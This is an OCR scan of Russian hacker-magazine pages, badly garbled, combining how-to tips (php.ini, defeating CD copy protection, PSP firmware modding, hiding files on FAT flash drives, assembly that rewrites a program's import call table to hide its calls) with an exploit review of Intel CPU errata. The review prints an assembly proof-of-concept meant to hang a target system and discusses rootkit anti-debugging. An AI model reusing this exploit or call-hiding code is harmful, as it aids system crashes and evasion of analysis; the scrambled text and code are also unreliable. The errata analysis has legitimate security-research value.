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ХАКЕРСКИЕ СЕКРЕТЫ 
ПРОСТЫХ ВЕЩЕЙ 



№1 



(ЗАДАЧА:! 



РЕШЕНИЕ: 

В наши дни, когда большинство веб-приложений пишется на РНР, 
довольно трудно представить себе сервер без РНР-интерпритатора. 

Ни для кого не секрет и то, что большинство веб-шеллов, бэкдоров и 
прочихудаленныххак-тулз пишется на РНР. Именно поэтому грамотной 
настройке РНР принято уделять повышенное внимание. Оттого, какты 
настроишь на сервере этот интерпретатор, зависит нетолько работоспо- 
собность веб-приложений, но, зачастую, и безопасность самого сервера. 
Наверняка ты слышал, что основной конфиг РНР — это файл рбр.іпі. Его 
мы и будем настраивать под свои нужды. Для многих основная трудность 
заключается в том, что он полностью на английском языке. Что ж, если ты 
не дружишь с амеро-буржуйской речью, то полноценный перевод рбр.іпі 
создан специально длятебя :). Поверь, с русифицированным конфигом 
ты разберешься в два счета. Оттебя лишьтребуется: 

1. Слить русифицированный рбр.іпі с нашего ДВД (или с ); 

2. Внимательно изучить конфиг, особое внимание обрати на настройки 
языка: 



; Настройки языка ; 



- Ы ілі ■ БпѵіШ'Л 



Файл Правка Формат Вид Справка 

; еггог^герогтіпд, остановите в тгие, если вы хотите, чтобы / 
; режима еггог_герогг1пд(0> было сохранено и при переходе ч щ 
; границу еѵ/аІО« 

; аззегс. диіет^еѵаі = 



Гіпдге 

іпдгез 



„ 03 II] 
пдгез . аі 1 оѵѵ_регз 1 з * епт =оп 
Іпдгез. тах_оегзІ5і:еітс— 1 
і пдгез. тах_1іпкЗ“-1 



; ваза данных по умолчанию (формат: [посіе^і сі: :] сІЬпате [/згѵ^с 
1пдгЕ5. йе^аыІт^сІатаЬаБе- 
1 пдгез . йе 1 =аіЛ т_изег- 
1 пдгез . сіе 1 =аи 1 т:_раззѵогсІ- 



[ѵегізідп РауИом Рго] 
рІргсигіе’Раи'кЫэз^- Че 5 Т. зідпіо.сот" 

Р'Ррго, сіе - Раи1 - срогг-443 
р!рго.сІе - Раи1 - с - сігпеои*-30 

; іР-адрес ргоху-сервера по умолчанию (если требуется). 
; р'Ррго. ргохуагі^гез5 = 

; порт ргоху-сервера по умолчанию 
; рбрго. ргохурогг^ 

; логин для ргоху-сервера по умолчанию 
; р'Ррго. ргохуіодоп- 

; пароль для ргоху-сервера по умолчанию 
; р'Ррго, ргохураззѵ^огсі« 



; ; конец, файла. ; ; 



1.^,1 п :“” ■ я,ш - : у '—.г. — -~ іі - _ 



НІШИНІШИІіУйИИ ІМІІ 



; Разрешает работу РНР для сервера АрасНе . 
епдіпе = Оп 

; Разрешает использовать короткие тэги <?. Иначе будут 
распознаваться только тэги <?рНр и <зсгір!>. 
зЪе>г1_ореп_1ад = Оп 

; Позволяет использовать тэги <% %> а-ля А8Р. 
азр_1адз = 011 

; Число значащих цифр после запятой, которые отображают- 
ся для чисел с плавающей точкой 
ргесізіоп = 14 

; Признак коррекции дат (проблема 2000 года, которая 
может создать вызвать непонимание со стороны браузеров, 
которые на это не рассчитывают) 
у2к_сошрііапсе = 011 



; Использование буферизации вывода. Позволяет посылать 
заголовки (включая Соокіез) после вывода текста . Правда, 
это происходит ценой незначительного замедления вывода. 

; Вы можете разрешить буферизацию во время выполнения 
сценария путем вызова функций буферизации, или же вклю- 
чить ее по умолчанию с помощью следующей директивы: 
ои!ри1_Ьи11егіпд =011 

; Директива неявной отсылки говорит РНР о том, что вы- 
водимые данные нужно автоматически передавать браузеру 
после вывода каждого блока данных. 

; Ее действие эквивалентно вызовам функции 11изП() после 
каждого использования ргіпі ( ) или есПо ( ) и после каждого 
НТМЬ-блока . 

; Включение этой директивы серьезно замедляет работу, 
поэтому ее рекомендуется применять лишь в отладочных 
целях . 
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ішр1ісі^_^1изЬ = ОПІ: 

; Безопасный режим 
за:Ее_тос1е = СЩі: 
заНе_тосіе_ехес_(Ііг = 

; Следующая директива содержит разделенный запятыми спи- 
сок имен переменных окружения, которые конечный пользо- 
ватель не сможет изменять путем вызова риДепѵО . 

; Эти переменные будут защищены даже в том случае, если 
директива разрешает их использовать. 
за^е_тоб.е_ргобесбе(і_епѵ_ѵагз = ББ_ЫВЕАКУ_РАТН 

; Эта директива позволяет вам запрещать вызовы некоторых 
функций из соображений безопасности. Список задается 



в виде имен функций, разграниченных запятыми. Директи- 
ва действует независимо от того, установлен безопасный 
режим или нет ! 
бізаЫе_^ипсбіопз = 

3. Выставить требуемые параметры и сохранить изменения (либо 
осуществитьаналогичные изменения в оригинальной версии рбр.іпі на 
своем сервере); 

4. Залить конфигс измененными параметрами на сервер. 

Вот и все! Думаю, никаких проблем утебя не возникнет, даже при незна- 
нии английского языка. 



№2 



ІЗАДАЧА: 



РЕШЕНИЕ: 

Проблема создания копии защищенного диска далеко не нова — сотни 
прог и куча обходных путей тому подтверждение. Правильное опре- 
деление метода защиты конкретного компакта позволяет выбрать 
правильные настройки проги для прожига и скопировать СО, несмотря 
на протекторы. 

1. Качаем утилу Сору Ргоіесбоп Оеіюсбоп последней версии. Интерфейс 
простой и понятный, поэтому пойдем дальше. 

2. Выбираем приводсзащищенным диском, щелкаем по баттону 
«Ое1:ес1». В области «Ргоіесбоп боипсі :» будет показан один из подде- 
рживаемыхтипов протекторов: базегбоск, ЗабеОіэк, ЗесиВОМ, СБ- 
Сорз, ОізкОиагсІ, ОиттуРіІез или ОѵегЬигп. 

3. Методы борьбы с каждым из них в отдельности можно найти в интер- 
нете, либо воспользоваться подсказкой самой проги: кликаем по кнопке 



«Ноѵѵ?»и выбираем из списка слева технологию защиты. 

Несмотря на то, что многиеутилы, определяющиетип защиты от копи- 
рования, настоятельно рекомендуют юзать для прожига прогу СІопеСО, 
советы по копированию (изтретьего пункта) можно использовать в 
любых других программах записи дисков, поддерживающих соответст- 
вующие фишки. 




Сору Ргоіесбоп Оеіесбоп 




ЗАДАЧА: 



ПЕРЕПРОШИТЬ Р5Р ДЛЯ ЗАПУСКА СТОРОННИХ ПРИЛО- 



ЖЕНИЙ 

РЕШЕНИЕ: 



Уточню, что под Р5Р подразумевается мультимедийная консоль 
Ріа у Слабой РогІаЫе. Изначально компания Зопу задумывала выпуск 
карманной игровой приставки со стандартными функциями. Но пере- 
прошив консоль, ты получишь полноценный КПК, который разве что 
кофе варить не будет :). 

Со сменой прошивки не все так просто. Во-первых, запандоритьака 
перепрошить можно лишь версии «Р5Р Раі» и «РЗРЗІіт — 2000», а вот 
самые новые «Р5Р 50т — 3000» с материнкой ТА-88ѵЗ сторонним изме- 
нениям подвергнуть не удастся. Итак, для смены дефолтовой прошивки 
на модифицированную 4.01 тЗЗ-2тебе понадобится: 

1. Оригинальная флешка Метогу 5бск Рио Рго (обрати внимание — Рго). 
Емкость — от 64 метров и выше. 

2. Оригинальный аккумулятор (серые китайские поделки можешь сразу 
выбросить). 

3. Сама консоль Р5Р (Р5Р Ра! или Р5Р 50т — 2000). 

4 . Комп сустановленной Виндой (2000/ХР). 



5 . Лезвие/нож и паяльникдля переделки аккумулятора (в случае с Р5Р 
Раі). 

Далее тебе нужно: 

1. Подготовить флешку Метогу Зііск Оію Рго (залить на нее установоч- 
ные файлы пандоры и саму прошивку). 

2. Исходя из типа аккумулятора, аккуратно отпаять/перерезать одну 
из ножек (какую — смотри на скрине). Будь внимателен, тип батарейки 
зависит от версии и типа самой консоли. 

3. Собрать аккумулятор, вставить флешку и установить новую прошивку 
прямо из меню Р5Р. 

Вся операциятребуетспокойствия и собранности, ибо одно неверное 
движение можетзапросто привести ктрагичным для твоего аккумуля- 
тора последствиям. Поэтому я настоятельно рекомендую тебе посетить 
сайт ѵѵѵѵѵѵ.рзрЬаскз.іпІю . который посвящен перепрошивке Р5Р. Либо 
же используй Гугл. 

Р.З. Кстати, если ты боишься все 
делать своими руками, то можешь 
купить уже переделанный акку- 
мулятор вместе с флешкой в спе- 
циализированном шопе — ѵѵѵѵѵ. 
рапбогазаіег.сот . 

Стоит подобный набор 
порядка $99. 
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галась на точке входа, на переход кобработчику, поэтому включаем ее в 
наш код сейчас, еще до инициализации счетчика): 

004ІЕБ4С МОѴ ЕАХ , БѴГОКБ РТК. Е8 : [ 0 ] ; инструкция, 

располагавшаяся на точке входа ранее 

0041ЕБ52 МОѴ ЕСХ,0041РВ10 ; адрес первой записи в 

таблице вызовов инициализирует счетчик 
0041ЕБ57 МОѴ ЕАХ, [ЕСХ] ; по адресу, указанном 

в счетчике, содержится машинный код перехода к вызывае- 
мой функции. Мы договорились заменить ]тр на ризП, чтобы 
сохранить адрес в стеке . Помещаем машинный код в ЕАХ и 
будем его модифицировать при помощи маски, накладываемой 
инструкцией ХОК 

0041ЕБ59 ХОК ЕАХ, 1000 ; меняем код таким обра- 

зом, чтобы СГМР операция БМР «превратилась» в РБЗН 
0041ЕБ5Е МОѴ [ЕСХ], ЕАХ ; помещаем модифициро- 

ванный машинный код обратно в память 

0041ЕБ60 МОѴ ЕВХ,231Е9 ; в ЕВХ помещаем код инс- 

трукции перехода к нашему обработчику-«БМР 0041ЕБ4С» 
0041ЕБ65 АББ ЕСХ, 6 ; увеличиваем счетчик; 

0041ЕБ68 МОѴ [ЕСХ] ,ЕВХ; помещаем в память машинный код; 
0041ЕБ6А АББ ЕСХ, 6 ; увеличиваем счетчик еще раз; 

0041ЕБ6Б СМР ЕСХ, 0041ЕБ44 ; сравниваем счетчик с 

адресом, по которому располагается последняя запись таб- 
лицы вызовов — функция <&СКТБШ . бап> . 

0041ЕБ73 БЫ2 8НОКТ 004ІЕБ57 ; если сравнение уда- 

лось, это означает, что обработка таблицы окончена 




Обработчик модифицировал таблицу вызовов. Файл прекрасно работает 



0041ЕБ75 БМР 004011Б0; передаем управление на вторую 
инструкцию, начиная от точки входа программы. 

3. Сохраняем изменения. Кстати, плеер запакован ІІРХ-ом, но распаковы- 
вается легко, при помощи того же ІІРХ в автоматическом режиме. Еслиты 
затрудняешься распаковать файл (нотогда непонятно, почемутыдосихпор 
это читаешь:)), возьми тот, который мы выложили для тебя на нашем ОѴЭ. 
Также на диске имеется модифицированный файл, содержащий обработ- 
чик. Если и после распаковки неудается сохранить модифицированную ехе- 
шку, увеличь размер поля РАѴѴ-секции кода (.бехб) при помощи богсІРЕ. 




кМіУДІШ ЗАШИТИТЬ ПРИВАТНУЮ ИНФОРМАЦИЮ 
РЕШЕНИЕ: 



Этот вопрос актуален во все времена, и сейчас существует множество 
способов защиты. Хочу предложить не совсем стандартный, но 1 00% 
рабочий и легкий в использовании: 

1. Нам понадобится флешка, на ней будет храниться инфа. Делаем 
ПОЛНОЕ (вместо быстрого) форматирование для очистки от мусора и 
качественного восстановления данных в дальнейшем. 

2. На просторах интернета выбираем прогу для восстановления данных 
с Лазб-девайсов либо с файловых систем ЕАТ. Нужна именно роНаЫе- 
версия.таккакзапускаться все будете флешки, а также желателен 
простой и легкий в обращении интерфейс. Для примера возьмем 
ЕФзЬМетогуМадіс 1 .3.1 5. 

3. Прога эта требует установку, но проблема вполне решаема. Устанав- 
ливаем в любое место на компе, открываем папочку, копируем на ЛазЬ’ку 
файл ЕІазЬМетогуМадіс.ехе, и делаем ипіпзФІІс компа. 

4 . Для работы все готово, копируем наши данные на флеш итутже 
стираем. На руках имеем носитель всего с 1 файлом ЕІазЬМетогуМадіс. 
ехе, но вся удаленная инфа хранится в файловой системе. Если нужно 
достать инфу — просто делаем восстановление данных, и за 3-4 клика 
мышью получаем ее обратно. 

Конечно, у этого подхода есть свои плюсы и минусы: 



+ о существовании инфы знает только ее владелец. 

+ при попадании в чужие руки данные будут полностью или 
частично уничтожены записью на НазЬ другой информации 
+ невозможно теневое копирование приватных данных, так 
как для всех прог их там и нет. 

+ минимальное время доступа к данным . Быстро и удобно . 



+ способ можно комбинировать с другими, например — зашиф- 
ровать файлы, перед копированием на флеш и удалением. 

— потерять инфу при копировании на носитель других файлов 
слишком легко . 

— для добавления новых файлов нужно проводить восста- 
новление всех файлов с флеша, проводить форматирование и 
закидывать старую инфу вместе с новой. Проблема частично 
решается созданием на девайсе двух и более разделов . 

— может вызвать подозрение завалявшаяся прога для вос- 
становления данных. Убрать с глаз можно разными спосо- 
бами, например, переименовать и запаролить сторонней 
прогой . ~5Г 



Инфы нет... или есть?:) 
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№4 

гл: ГіП СПРЯТАТЬ ФАЙЛЫ и папки, находящиеся на флеш- 
ке, ОТФОРМАТИРОВАННОЙ В СИСТЕМЕ РАТ1 6 ИЛИ РАТ32, ОТ ЛЮБО- 
ПЫТНОГО ГЛАЗА. 

РЕШЕНИЕ: 

Безопасность прежде всего! Конфиденциальность данных нужно обес- 
печивать всеми доступными методами раньше, чем жизнь начнет давать 
горькие уроки. В ходе нашего эксперимента была получена интересная 
методика сокрытия файлов, находящихся на носителе, при помощи 
внесения изменений в разметочную таблицу диска. 

Выяснилось, что «обнуление» (замена значащих байт нулями] имени 
конкретного файла или директории содержащегося в разметочной 
таблице съемного диска приводитксокрытию файлов и папок, имена 
которых в таблице разметки диска располагаются «ниже» этого имени. 
Таким образом можно скрывать группу файлов, если имеется доступ к 
таблице разметки диска. Эксперименты проводятся на базе носителя 
(флешки], размеченного в системе РАТ1 6. С РАТ32 все аналогично. В 
работе нам поможетзамечательный редактор ѴѴіпНех. 

1. Открываем физический носитель в ѴѴіпНех: выбираем из меню програм- 
мы пункт «Тооіз-^ Ореп Оізк», щелкаем по значку диска и нажимаем «Ок». 

2 . В окне дампа находим имя целевого файла — оно можетбыть записано 
какв АБСМ, так и в Юникоде, взависимости отего длины. 

3. В окне, содержащем списокдиректорий, выбираем корневую («Рооі 
сіігесіогу»]. В окне дампа произойдет автоматическое перемещение к 
началу этой директории. 

4 . В окне дампа находим имя нужной директории\файла и затираем его 
нулями (следует помнить, что модифицировать нужно шестнадцатерич- 
ные значения, которые отображаются слева отАЗСІІ-дампа). 

5 . Сохраняем сделанные изменения и подтверждаем запись на диск. 
Внимание! Перед тем, какприступить креальному сокрытию данных, 




а мена имени файла нулевыми байтами приведет к сокрытию содержи - 
ого съемного диска 



проведи несколько экспериментов с носителями, которые не содержат 
ценных файлов — это поможет избежать головной боли, связанной с 
восстановлением утерянной информации. И ни в коем случае не проводи 
подобные «опыты» сжесткими дисками, — это может за кончиться пе- 
чально и для операционной системы, и для носителя в целом. 

Существует один важный нюанс: если имя файла/директории короткое (ме- 
нее 8 букв), достаточно его «затереть», и система неувидитни этот файл/ди- 
ректорию, ни папки и файлы, располагающиеся втаблице разметки вслед 
за ним. Еслиже имя длинное, втаблицеонозаписано в Юникоде, и каждая 
буква кодируется двумя байтами. Скрыть от системы файл с длинным име- 
нем еще проще — обнуляем байт, расположенный в Ьех-дампе прямо перед 
началом имени, и он «исчезает»! Только помни, что втаком случае файл 
можетбыть перезаписан при копировании на носитель новых данных :]. 
Существуетэффективный прием для сокрытия абсолютно всех данных, за- 
писанных на носитель. Он очень прост: выбери в списке директорий папку 
«(РооТ сІ'ігесТогу)», которая представляет прообраз корневого каталога, и в 
окнедампа обнули первый относящийся кней байт. Теперьсохрани изме- 
нения. Кстати, заметил, что место, занимаемое файлами, не освободилось? 




ЗАДАЧА 



ДНАПИСАТЬ КОД, КОТОРЫЙ БУДЕТ АВТОМАТИЧЕСКИ 
ПЕРЕСТРАИВАТЬ ТАБЛИЦУ ВЫЗОВОВ ФУНКЦИЙ В ПРОГРАМ- 
МЕ ТАК, ЧТОБЫ ВЫЗОВ ПРОИСХОДИЛ НЕЯВНО 

РЕШЕНИЕ: 



Рассмотрим программу ІЪуІ . ехе — небольшой аудиоплеер, который 
идеально подходит для нашихэкспериментов. Загрузив программу под 
отладчиком, выясняем, что вызовы происходят следующим образом: 



00401214 САШ < ДМР . &СКТБШ . Се1МаіпАгдз> 

; вызов адреса 00411Ы0 



0041РВ10 ЙМР ШОКБ РТР БЗ: [47 688 0] ; переход по 

адресу, на который указывает значение ячейки 47 6880 

Попробуем изменитьмеханизм вызоватак, чтобы вместо безусловного пере- 
хода выполнялось помещение адреса в стек и переход к написанному нами 
коду, который будет передавать управление на адрес, взятый из стека. Зачем 
нам это? Мы можем написать автоматический обработчик, который будет 
менять всютаблицу вызовов функций с шифровкой и дешифровкой адресов 
вызова. Таким образом, мы сможем скрыть все явные саЕ-ы! Но шифровать 
в нашем примере мы ничего не будем, иначе получится слишком громоздко 
(попробуешь это позже сам]. Мы напишем лишьобработчик. 

Постараемся представить, как будет выглядеть модифицированный 
вызов. Должно получиться приблизительно следующее: 



0041РВ10 РБЗН <&СКТБББ . Се1МаіпАгдз> ; сохра- 

няем указатель , который содержит адрес функции 
0041РВ15 ДМР 1Ъу1_шір . 0041РБ4С ; пере- 

ходим на внедренный нами код 

0041164с а66езр,4 ; увеличиваем езр , чтобы 

«вытеснить из стека» указатель, помещенный нами 
00411641 зтр [езр-4] ; извлекаем из указателя адрес 

функции и передаем ей управление 

В случае единичного вызова все сработаетзамечательно. Если же 
исправить так все вызовы, то мы наткнемся на бесконечную рекурсию. 
Придется разбираться с 5ЕН, и будет полный завал! Сложности нам ни 
к чему, — напишем более простой код, который разместим по адресу 
0041РБ4С. В рекурсию код уходить не будет, мы изменим таблицу 
вызововтаким образом, чтобы при каждом выполнении операции са{| 
передача управления производилась не на сторонний код, а на написан- 
ный нами обработчик. Придется попотеть, но результат стоит стараний. 

1. Загружаем программу под ОНуйбд и оказываемся наточке входа про- 
граммы. Запоминаем первую инструкцию, которую заменим переходом к 
нашему обработчику: 

004011СВ ДМР 0041РБ4С 

2 . Размещаем код по адресу 0041РБ4С. Обрабатывать записи таблицы 
вызовов функций будем в цикле, управляемом регистром есх. На- 
чальным значением регистра будет адрес первой записи втаблице, 

которая располагается по адресу 0041РВ10, это — функция СКТБЬЬ . 

ОеІМаіпАгдз (не забывай, мы заменили инструкцию, которая распола- 
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КРИС КАСПЕРСКИ 


ОБЗОР ЭКСПЛОЙТОВ 



В КОНЦЕ ОКТЯБРЯ В МАЛАЙЗИИ СОСТОЯЛАСЬ КОНФЕРЕНЦИЯ НІТВ (НАСК Ш ТНЕ ВОХ), ГДЕ 
Я ЗАЧИТАЛ ДОКЛАД ОБ ОШИБКАХ ЦП, ДОПУСКАЮЩИХ ЛОКАЛЬНЫЕ И УДАЛЕННЫЕ АТАКИ НА 
СИСТЕМУ. ЭТО ВЫЗВАЛО ОГРОМНЫЙ ОБЩЕСТВЕННЫЙ ИНТЕРЕС, И ПОТОМУ СЕГОДНЯШНИЙ ОБ- 
ЗОР Я РЕШИЛ ПОСВЯТИТЬ ПРОЦЕССОРНЫМ БАГАМ, ПРОДЕМОНСТРИРОВАВ ТЕХНИКУ ВТОРЖЕНИЯ 
В ЧУЖИЕ КОМПЬЮТЕРЫ. 

любую операционную систему (естественно, изтех, что поддерживают 
многопроцессорность; ѴѴіпсІоѵѵз 9х не поддерживает, и потому ее никакие 
сломаешь]. 5ЬеІІ-код, разумеется, привязан кконкретной операционной 
системе и должен проектироваться сучетом специфики ее архитектуры, 
однако это уже вторая фаза атаки, которая нетак интересна, как принци- 
пиальная возможность удаленного «впрыскивания» кода в память ядра. 

О том, как это сделать, можно прочитать в Вресііісабоп 1)рсІа1:е: 3 г фоа 1 

іпІеІ.сот/сіезіап/ппоЫІе/зресирсІ 1/3201 21 . рсіб (А773 — Метогу Огсіегіпд 
ѴіоІаЬоп ѴѴТЬ Віюгез/Ьоасіз Сгоззіпд а СасЬеІіпе Воипсіагу]. 



»ТагдеІ5| 



ІпіеІСоге 2 Ехітете ОиасІ-Соге МоЬіІе, ІпіеІСоге 2 ОиасІ МоЬіІе, I пЕеІ Соге 2 
Ехітете МоЬіІе, I піеі Соге 2 Оио МоЬіІе Ргосеззог, I піеі Соге 2 5о1о МоЬіІе и 
ІпІеІСеІегоп 45-пт. 



находящиеся в кэш-памяти первого уровня междудвумя кэш-линей- 
ками. Согласно еггаіа, при этом происходит нарушение очередности 
последовательности записей/чтения, что не совсем соответствует дейс- 
твительности. Іпіеі неудосужиласьупомянуть«удар по памяти» — кэш- 
контроллер «забывает» подлинный адрес скэшированных ячеек памяти 
и выгружаетмодифицированныеданныесовершенно в другое место. 
Выгрузка проводится уже после проверки атрибутов защиты страниц, за 
счет чего становится возможным атаковать код операционной системы 
с прикладного уровня. Атаковать можно очень большое количество при- 
ложений, втом числе и операционную систему, — даже если сами по себе 
они и не содержатошибок. Атакующему нужно, чтобы целевой код обра- 
батывал разделяемые данные в двух или более потоках, причем, один 
потокзаписывал, а другой — читал. Драйвер ТСР/ІР-стека представляет 
собой отличную мишень для атаки, поскольку в момент прихода очеред- 
ного ІР-пакета сетевая карта генерирует прерывание, подхватываемое 
свободным процессором. И если в этот моментупадет еще один пакет, 
операционная система автоматически отправитего на второй процессор, 
вынужденный взаимодействовать с первым (а какиначесобиратьТСР- 
пакеты из I Р?] . Направленный шторм ТСР/ІР-пакетов — «пробивает» 




ШТЕЬСОКЕ 

ЕЩЕ ОДНА ОШИБКА КОГЕРЕНТНОСТИ 

и кэша 



В середине октября (непосредственно перед конференцией НІВТ) I пЕеІ 
обнаружила еще один дефект кэш-контролера первого уровня, который 
и описала в еггаіа под номером А273. Приведенной информации оказа- 
лось достаточно для воспроизведения ошибки на ноутбуке, но отладить 
ехріоіі; в условиях гостиничного номера за оставшееся перед выступле- 
нием время не получилось. Тем не менее, модификация ядерной памяти 
операционной системы с прикладного уровня проходила стабильно и 
вполнеуспешно. Азначит, есть все основания ожидать, что техника будет 
взята на вооружение таіѵѵаге-писателями. Для этого достаточно заста- 
вить несколько процессорных ядер обрабатывать разделяемые данные, 
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Товар сертифицирован. Реклама. 



ВЗЛОМ 



» 




Процессор Ігііеі Соге2 Ехігете Оиаб-Соге под микроскопом 



|» Ехріоід 



Ниже приводится ключевой фрагмент р гооі'-оі'-со псері: ехріоіі’а, 
разработанного хакером 2еп Иее с целью завешивания целевой 
системы. Циклы С0РЕ1/С0РЕ2 должны выполняться в раздельных 
потоках, «закрепленных» за своими ядрами. Регистр Е ОХ указывает 
на заранее выделенный блок памяти размером 64Кбайт, общий для 
всех ПОТОКОВ: 

СОКЕ1 : 

шоѵ еах, сіѵ\гогс1_40503 О 

ішиі еах, 343ЕБІ1 

ас3.сі еах, 269ЕСЗЦ. 

шоѵ <±лгогс1_40503 0 , еах 

заг еах, ІОЪ. 

апсі еах, 7РРРЬ 

ссіхз 

шоѵ есх, ІЕЕЪ. 

ісііѵ есх 

шоѵ есіх, с!ѵ\гогсі_4054С2 [есЬс] 

шоѵ <±лгогс1_40543 8 , есіх 
ЦМР СОЕЕ1 
СОЕЕ2 : 

шоѵ еах, сілгогсі_40503 О 

ішиі еах, 343ЕБІ1 



асісі 


еах, 269ЕСЗЦ. 


шоѵ 


с!ѵ\гогсі_4 0503 0 , еах 


заг 


еах, ЮЪ. 


апсі 


еах, 7ЕЕЕЦ 


ссЩ 




шоѵ 


есх, ІЕЕЪ 


ісііѵ 


есх 


шоѵ 


еах, сѣѵогсі_40543 8 


шоѵ 


с!ѵ\гогсі_4054С2 [есіх] , еах 


зіюгЦ . 


_шаіп 



ДМР СОКК2 



»5оІи1іоп 



I піеі работает над исправлением микрокода, который после выхода в 
свет будет доступен разработчикам В 105. Однако далеко не все из них 
включают последние версии микрокода в очередную версию своей про- 
шивки, да и обновления ВІОЗ’а на ноутбуке — операция не из штатных, а 
потому ситуация — ласты. Кто не спрятался, тот сам себя и наказал. 

ІІЧТЕІ-СОВЕ 

МНОЖЕСТВЕННЫЕ ОШИБКИ ХВ5Т0В/ 
Х5АѴ 



» Вгіе* 



Команда ХР5Т0Р, восстанавливающая состояние процессора, сохранен- 
ное командой Х5АѴЕ, оказалась жутко багистной — только за последний 
месяцв ней обнаружилосьтри новыхошибки, ведущих к краху системного 
программного обеспечения, использующего ее в своих целях. Ошибка, 
проходящая в еггаіа [смотри ЬіІрУ/боѵупІоаб.іпІебсот/безіап/тоЬіІе/ 
зресирсі 1/3201 21 .рсіі і под кодовым номером АХ74 (ТЬеХВЗТОВ Іпзігисііоп 
Мау Еаіііо Саизе а Сепегаі-Ргоіесііоп] позволяет процессору взводить за- 
резервированные биты 63:9 регистра ХЕЕАТСРЕ_ЕІ\ІАВЕЕ0_МА5К (ХСРО) 
без генерации исключения общей защиты, как это следует из документа- 
ции. Само по себе это не опасно, но позволяет создать код, работающий 
только на багистных процессорах. В малвари, отловленной в дикой 
природе, сей баг использовался для детекции уязвимых процессоров, а, 
быть может, и для чего-то еще. Две других ошибки относятся к инструкции 
Х5АѴЕ. Согласно еггаіа, А271 (ТЬеХЗАѴЕ Іпзігисііоп Мау ЕггопеоизІуЗеІ 
РезегѵесІ Вііз іп 1беХ5ТАТЕ_ВѴ Еіеісі), каки следуетиз ее названия, при оп- 
ределенных обстоятельствах взводитзарезервированные биты регистра 
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ХСПО, что ведет к непредсказуемому поведению программного обеспече- 
ния, уверенного, что эти биты равны нулю (как утверждает документация]. 

- Ошибка А272 [5*оге Огбегіпд Ѵіоіабоп ѴѴЬеп Юзіпд Х5АѴЕ) намного более 
коварна: если программист используетХВАѴЕ для сохранения одного 
лишь55Е-контекста,то происходит переупорядочивание операций за- 
писи — инструкции отгружают да иные в память совсем не в том порядке, в 
котором ожидает программист. Что и ведет к непредсказуемому поведе- 
нию приложения и зачастую сопровождается крахом. 



»ТагдеІ5: 



I пЕеІ Соге2 Ехіхете Оиаб-Соге МоЬіІе, Іпіеі Соге 2 Оиаб МоЬіІе, ІпіеІСоге 
2 Ехігете МоЬіІе, I пЕеІ Соге 2 Оио МоЬіІе Ргосеззог, Іпіеі Соге 2 5о1о 
МоЬіІе и Іпіеі Сеіегоп 45-пт. 



» Ехріоід 



Отсутствует. 



»5оІи1іоп 



I піеі исправила ошибку в процессорахсо степпингом Е-0, атакже вы- 
пустила обновленный микрокод. Ввидутого, что ошибки реализации 
ХР5Т0Р/Х5АѴЕ невозможно использовать ни для удаленных атак, 
ни для локального повышения привилегий, смысла накладывать 
заплатки на процессор нет. 




ШТЕІ.СОКЕ 

РАЗРУШЕНИЕ РЕГИСТРА С5 ПРИ 
ПЕРЕХОДЕ В РМ 



»Вгіе* 



Наконец-то Іпіеі обнародовала информацию, объясняющую логику 
работы антиотладочных приемов, встречающихся в некоторых 
гооікіі’ах. Впрочем, «обнародовала» — это сильно сказано! Всего 
лишь приоткрыла дверь в потайную комнату, и в образовавшуюся 
щель просочился крошечный лучик света, позволяющий (не без 
мата, конечно] разобраться в ситуации. На первый взгляд, сообще- 
ние об ошибке А270 (СоггирЬоп оІСВВедтепІ: Ред ізЕег Оигіпд В5М 
ѴѴЬіІе Тгапзібопіпд Егот Веаі Мобеіо Ргоіесіеб Мобе] носитневме- 
няемый характер. Если при переходе из реального в защищенный 
режим неожиданно придет прерывание от«Системного Менеджера 
Прерываний» (Бузует Мападетепі: Іпіеггирі: или, сокращенно, 5МІ], 
случившееся послетого, какбит РЕ (РгоІюсЬоп ЕпаЫе) регистра СРО 
уже взведен, но 6МР ЕАР еще не выполняется, — процессоругробит 
два младших бита регистра С5, однако все будет работать. Во всяком 
случае, если программист не попытается прочитать содержимое С5 
инструкцией МОѴ или каким-то другим способом. Ситуация, прямо 



скажем, немыслимая. Вероятность возникновения прерывания на столь 
узком временном промежутке близка к нулю. Ктомуже, сугробленным 
С5 можно какое-то время работать — пока не начали читать его содержи- 
мое. И в чем здесь соль? А втом, что регистр С5, как и другие сегментные 
регистры, является лишь «надстройкой» над механизмом трансляции 
адресов и внутри процессора явным образом не используется. Именно 
потому с испорченным С5 система продолжает работать, а испортить ре- 
гистр можно множеством способов (связанных с ошибками реализации 
команд гипервизора, например]. Прикладная программа после порчи 
регистра С5 продолжает работать нормально, а вот отладчики выбра- 
сывают исключение, ругаясь на неправильный селектор. Хакер смотрит 
— и офигивает: селектор, действительно, неправильный! Попытки 
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разобраться, откуда берется неправильный селектор втаблице дескрип- 
торов и куда исчезает — обречены на провал, поскольку на самом деле, 
селектор ни откуда не берется и никуда не девается, это всего лишь 
следствие разрушения регистра С5. Воттакой антиотладочный прием. 
Перезагрузка С5 валидным значением позволяет продолжить отладку. 



»ТагдеІ5| 



Іпіеі Соге2 Ехігете ОиасІ-Соге МоЬіІе, ІпІеІСоге 2 ОиасІ МоЬіІе, I пііеі 
Соге2 Ехігете МоЬі Іе, ІпІеІСоге2 Оио МоЬіІе Ргосеззог, I пііеі Соге 2 5оІо 
МоЬіІе и Іпіеі Сеіегоп 45- пт. 



» Ехріоід 



Отсутствует. 



»5оІи(іоп 



Іпіеі исправила ошибку в процессорах со степпингом Е-0, а также выпус- 
тила обновленный микрокод. 



РЬЕОМАХ 

а зепзІЫе ЬІі о! $АМ$УІ\ІС 



СК055-М00ІРѴШ6 СОРЕ АТТАСК5 

Первое (вжизни!) мое выступление закончилось провалом. Только 
взошел на подиум — тутже забыл половину изтого, что хотел сказать. В 
результате, вместо запланированных 60 минут говорил только пол- 
часа сужасным русским акцентом. Народ обречено втыкал в слайды, 
набранные мелким шрифтом, а качество мультимедийного проектора 
было, скажем так, далеко не на высоте. Чувство уверенности, что это 
действительно провал, укрепилось на заключительной вечеринке, где 
ко мне подходили симпатичные японки и, дружески толкая плечом, 
говорили: все было круто, типа, не переживай. Ага, понятно. Если бы все 
было действительно круто, они бы не подходили. Впрочем, я и не думал 
переживать. В конце концов, надо же с чего-то начинать. 

Презентация подняла намного больше вопросов, чем решила и, обсуж- 
дая схакерами сложившиеся перспективы, я обогатил себя свежими 
идеями, открывающими двери в мир новыхатак. Скромные рамки 
журнальной статьи не позволяют рассказать обо всех атаках целиком, 
поэтому приходится выбирать что-то одно. Наибольший интерес вызвал 
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Азиатов действительно мало, но на них стоит посмотреть! Грациозной походкой впорхнуть в переполненный вагон — не каждый русский на это 
способен! 



